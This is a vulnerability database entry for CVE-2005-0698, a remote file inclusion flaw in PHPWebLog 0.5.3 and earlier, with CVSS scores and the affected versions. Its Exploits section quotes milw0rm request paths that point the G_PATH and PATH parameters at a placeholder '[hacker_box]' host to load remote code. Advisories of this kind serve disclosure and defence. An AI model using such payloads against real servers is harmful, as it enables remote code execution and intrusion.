4.6
CVSSv2

CVE-2005-0698

Published: 07/03/2005 Updated: 05/09/2008
CVSS v2 Base Score: 4.6 | Impact Score: 6.4 | Exploitability Score: 3.9
VMScore: 465
Vector: AV:L/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in PHPWebLog 0.5.3 and previous versions allows remote malicious users to execute arbitrary PHP code by modifying the (1) G_PATH parameter to init.inc.php or the (2) PATH parameter to index.php to reference a URL on a remote web server that contains the code.

Vulnerable Product Search on Vulmon Subscribe to Product

jason hines phpweblog 0.5

jason hines phpweblog 0.5.2

jason hines phpweblog 0.4.2

jason hines phpweblog 0.5.1

jason hines phpweblog 0.5.3

Exploits

Example: if register_globals=on and allow_url_fopen=on: [victim]/[dir]/include/initincphp?G_PATH=[hacker_box]/ [victim]/[dir]/backend/addons/links/indexphp?PATH=[hacker_box]/ # milw0rmcom [2005-03-07] ...